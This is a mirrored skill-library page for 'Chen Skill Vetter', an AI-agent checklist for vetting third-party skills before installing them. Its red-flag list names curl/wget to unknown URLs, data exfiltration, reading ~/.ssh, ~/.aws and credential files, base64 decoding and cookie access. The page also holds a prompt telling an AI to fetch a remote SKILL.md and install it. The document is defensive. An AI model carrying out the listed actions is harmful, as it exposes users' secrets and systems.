技能详情(站内镜像,无评论)
许可证:MIT-0
MIT-0 ·免费使用、修改和重新分发。无需归因。
版本:v1.0.0
统计:⭐ 0 · 244 ·当前安装3次·历史安装3次
⭐ 0
安装量(当前) 3
🛡 VirusTotal :良性 · OpenClaw :良性
Package:cs995279497-byte/chen-skill-vetter
安全扫描(ClawHub)
- VirusTotal :良性
- OpenClaw :良性
OpenClaw 评估
该技能是仅限说明的审核清单,其要求和说明符合其说明的目的,并且不要求额外的权限或凭据。
目的
名称和描述声明了一个审查/清单工具;该技能仅包含用于检查存储库和技能文件的散文说明和示例命令。没有声明二进制文件、环境变量、安装或奇怪的要求—所有这些都适合审核员。
说明范围
SKILL.md指示客服代表阅读技能的文件、检查明确的危险信号、审核权限范围并生成结构化报告。它包括安全的GitHub API curl示例。它没有指示代理读取不相关的系统机密;它明确地将读取~/.ssh、~/.aws、凭据文件或泄露标记为拒绝条件。
安装机制
不存在安装规范或代码文件(仅限指令)。技能本身不会下载或写入磁盘。
证书
该技能未声明环境变量、凭据和配置路径要求。其示例命令仅使用未经身份验证的GitHub API调用;这与其目的成正比。
持久
始终为false ,并且没有修改代理/系统配置或其他技能的说明。disable-model-invocation为false (正常) ;此组合适用于用户可调用的兽医。
综合结论
此技能是一个简单的审核清单,看起来很连贯,适合安装。在继续之前,有一些实用注意事项: ( 1 )审核员希望代理或人员读取目标技能的文件—避免授予其更广泛的文件系统访问权限或网络权限,而不是只读访问您要审查的技能存储库的权限; ( 2 ) GitHub curl示例未经身份验证,可能会达到速率限制—提供……上的凭据
安装(复制给龙虾 AI)
将下方整段复制到龙虾中文库对话中,由龙虾按 SKILL.md 完成安装。
请把本段交给龙虾中文库(龙虾 AI)执行:为本机安装 OpenClaw 技能「Chen Skill Vetter」。简介:人工智能代理的安全第一技能审查。在安装ClawdHub、GitHub或其他来源的任何技能之前使用。检查危险信号、权限范围等。
请 fetch 以下地址读取 SKILL.md 并按文档完成安装:https://raw.githubusercontent.com/openclaw/skills/refs/heads/main/skills/cs995279497-byte/chen-skill-vetter/SKILL.md
(来源:yingzhi8.cn 技能库)SKILL.md
---
name: chen-skill-vetter
version: 1.0.0
description: Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
---
# Skill Vetter 🔒
Security-first vetting protocol for AI agent skills. **Never install a skill without vetting it first.**
## When to Use
- Before installing any skill from ClawdHub
- Before running skills from GitHub repos
- When evaluating skills shared by other agents
- Anytime you're asked to install unknown code
## Vetting Protocol
### Step 1: Source Check
```
Questions to answer:
- [ ] Where did this skill come from?
- [ ] Is the author known/reputable?
- [ ] How many downloads/stars does it have?
- [ ] When was it last updated?
- [ ] Are there reviews from other agents?
```
### Step 2: Code Review (MANDATORY)
Read ALL files in the skill. Check for these **RED FLAGS**:
```
🚨 REJECT IMMEDIATELY IF YOU SEE:
─────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
─────────────────────────────────────────
```
### Step 3: Permission Scope
```
Evaluate:
- [ ] What files does it need to read?
- [ ] What files does it need to write?
- [ ] What commands does it run?
- [ ] Does it need network access? To where?
- [ ] Is the scope minimal for its stated purpose?
```
### Step 4: Risk Classification
| Risk Level | Examples | Action |
|------------|----------|--------|
| 🟢 LOW | Notes, weather, formatting | Basic review, install OK |
| 🟡 MEDIUM | File ops, browser, APIs | Full code review required |
| 🔴 HIGH | Credentials, trading, system | Human approval required |
| ⛔ EXTREME | Security configs, root access | Do NOT install |
## Output Format
After vetting, produce this report:
```
SKILL VETTING REPORT
═══════════════════════════════════════
Skill: [name]
Source: [ClawdHub / GitHub / other]
Author: [username]
Version: [version]
───────────────────────────────────────
METRICS:
• Downloads/Stars: [count]
• Last Updated: [date]
• Files Reviewed: [count]
───────────────────────────────────────
RED FLAGS: [None / List them]
PERMISSIONS NEEDED:
• Files: [list or "None"]
• Network: [list or "None"]
• Commands: [list or "None"]
───────────────────────────────────────
RISK LEVEL: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME]
VERDICT: [✅ SAFE TO INSTALL / ⚠️ INSTALL WITH CAUTION / ❌ DO NOT INSTALL]
NOTES: [Any observations]
═══════════════════════════════════════
```
## Quick Vet Commands
For GitHub-hosted skills:
```bash
# Check repo stats
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars: .stargazers_count, forks: .forks_count, updated: .updated_at}'
# List skill files
curl -s "https://api.github.com/repos/OWNER/REPO/contents/skills/SKILL_NAME" | jq '.[].name'
# Fetch and review SKILL.md
curl -s "https://raw.githubusercontent.com/OWNER/REPO/main/skills/SKILL_NAME/SKILL.md"
```
## Trust Hierarchy
1. **Official OpenClaw skills** → Lower scrutiny (still review)
2. **High-star repos (1000+)** → Moderate scrutiny
3. **Known authors** → Moderate scrutiny
4. **New/unknown sources** → Maximum scrutiny
5. **Skills requesting credentials** → Human approval always
## Remember
- No skill is worth compromising security
- When in doubt, don't install
- Ask your human for high-risk decisions
- Document what you vet for future reference
---
*Paranoia is a feature.* 🔒🦀